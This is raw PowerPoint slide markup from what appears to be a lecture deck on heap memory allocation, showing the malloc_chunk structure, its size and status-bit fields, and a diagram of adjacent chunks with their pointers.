                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>malloc_chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prev_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; // only used when previous chunk is free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> size; // size of chunk in bytes (including overhead </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>               // and multiple of 8 bytes) + 2 status bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>malloc_chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; // only used for free chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>malloc_chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; // only used for free chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointer returned by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> starts at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually 8 bytes overhead for allocated chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1511595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45507" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="919655" y="2171701"/>
            <a:ext cx="6669690" cy="3121819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1045508" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chunk Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384303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7556" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chunk Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1047557" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prev_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only used when previous chunk is free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To reduce memory waste, field can hold user data of previous chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Holds chunk size in bytes, but size is always a multiple of 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chunk size = requested memory (by user via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) + 8 bytes (overhead) - 4 bytes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>prev_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> field of next chunk) rounded up to next multiple of 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>least significant bits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>of the size are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>always 0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>so two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of them are used as status bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PREV_INUSE (0x01) – 1 if previous chunk is in use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IS_MMAPED (0x02) – 1 if chunk is memory mapped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80407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3394" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chunk Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="22288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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(not used here)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083396" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="24574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PREV_INUSE=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083397" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2686050"/>
            <a:ext cx="2362200" cy="6858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3398" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="33718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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(not used here)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083399" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="36004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PREV_INUSE=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083400" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="4286250"/>
            <a:ext cx="2362200" cy="3429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free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083401" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="46291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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083402" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="48577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PREV_INUSE=0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083403" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="5086350"/>
            <a:ext cx="2362200" cy="6858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3404" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="2686050"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="me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05" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600201" y="2343150"/>
            <a:ext cx="934471" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083406" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="38290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fd pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083407" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="40576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bk pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083408" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="5086350"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="me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09" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="4743450"/>
            <a:ext cx="939580" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083410" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="3429000"/>
            <a:ext cx="76200" cy="1200150"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 175000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEn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11" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="3771900"/>
            <a:ext cx="932066" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083412" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="2228850"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="me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13" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="4629150"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="me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14" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="3371850"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="me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15" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3257550"/>
            <a:ext cx="1371600" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083416" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2114550"/>
            <a:ext cx="1371600" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083417" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="4514850"/>
            <a:ext cx="1371600" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
